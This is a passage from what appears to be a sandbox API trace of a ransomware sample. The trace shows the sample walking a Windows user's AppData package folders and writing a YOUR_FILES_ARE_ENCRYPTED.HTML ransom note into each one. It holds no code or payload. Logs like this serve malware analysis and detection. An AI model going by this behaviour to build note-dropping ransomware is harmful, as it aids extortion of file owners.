pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 145 [0118.242] GetProcessHeap () returned 0x600000 [0118.242] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.249] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.250] CloseHandle (hObject=0x214) returned 1 [0118.250] GetProcessHeap () returned 0x600000 [0118.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.250] GetProcessHeap () returned 0x600000 [0118.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.252] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0118.252] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.252] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies") returned 117 [0118.252] GetProcessHeap () returned 0x600000 [0118.252] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.253] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies" [0118.253] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies\\*" [0118.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0118.258] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 1 [0118.258] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 0 [0118.258] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0118.258] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0118.258] GetProcessHeap () returned 0x600000 [0118.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.262] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.264] CloseHandle (hObject=0x320) returned 1 [0118.264] GetProcessHeap () returned 0x600000 [0118.264] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.264] GetProcessHeap () returned 0x600000 [0118.264] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.265] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0118.265] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.265] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory") returned 117 [0118.265] GetProcessHeap () returned 0x600000 [0118.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.266] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory" [0118.266] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory\\*" [0118.266] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.266] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 1 [0118.266] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 0 [0118.266] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.266] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0118.266] GetProcessHeap () returned 0x600000 [0118.266] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.267] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.268] CloseHandle (hObject=0x320) returned 1 [0118.269] GetProcessHeap () returned 0x600000 [0118.269] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.269] GetProcessHeap () returned 0x600000 [0118.269] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.269] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="Temp", cAlternateFileName="")) returned 1 [0118.269] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.269] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp") returned 110 [0118.269] GetProcessHeap () returned 0x600000 [0118.269] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0118.270] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp" [0118.270] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp\\*" [0118.270] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0118.271] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 1 [0118.271] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f64b8, dwReserved1=0x3187cb8, cFileName="..", cAlternateFileName="")) returned 0 [0118.271] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0118.271] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0118.271] GetProcessHeap () returned 0x600000 [0118.271] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0118.272] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.273] CloseHandle (hObject=0x320) returned 1 [0118.273] GetProcessHeap () returned 0x600000 [0118.273] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.273] GetProcessHeap () returned 0x600000 [0118.273] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.273] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a66c47, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a66c47, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a66c47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="Temp", cAlternateFileName="")) returned 0 [0118.273] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.273] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0118.273] GetProcessHeap () returned 0x600000 [0118.273] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.274] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.275] CloseHandle (hObject=0x324) returned 1 [0118.275] GetProcessHeap () returned 0x600000 [0118.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.275] GetProcessHeap () returned 0x600000 [0118.275] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.276] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0118.276] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.276] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData") returned 110 [0118.276] GetProcessHeap () returned 0x600000 [0118.276] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.278] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData" [0118.278] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData\\*" [0118.278] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.278] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 1 [0118.279] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x89a40a93, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x89a40a93, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x89a40a93, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d7e, dwReserved1=0x3187cb0, cFileName="..", cAlternateFileName="")) returned 0 [0118.279] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.279] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0118.279] GetProcessHeap () returned 0x600000 [0118.279] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.assignedaccesslockapp_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.281] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.282] CloseHandle (hObject=0x324) returned 1 [0118.282] GetProcessHeap () returned 0x600000 [0118.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.282] GetProcessHeap () returned 0x600000 [0118.282] HeapFree (in: hHeap=0x600000, dwFlags=0x0, 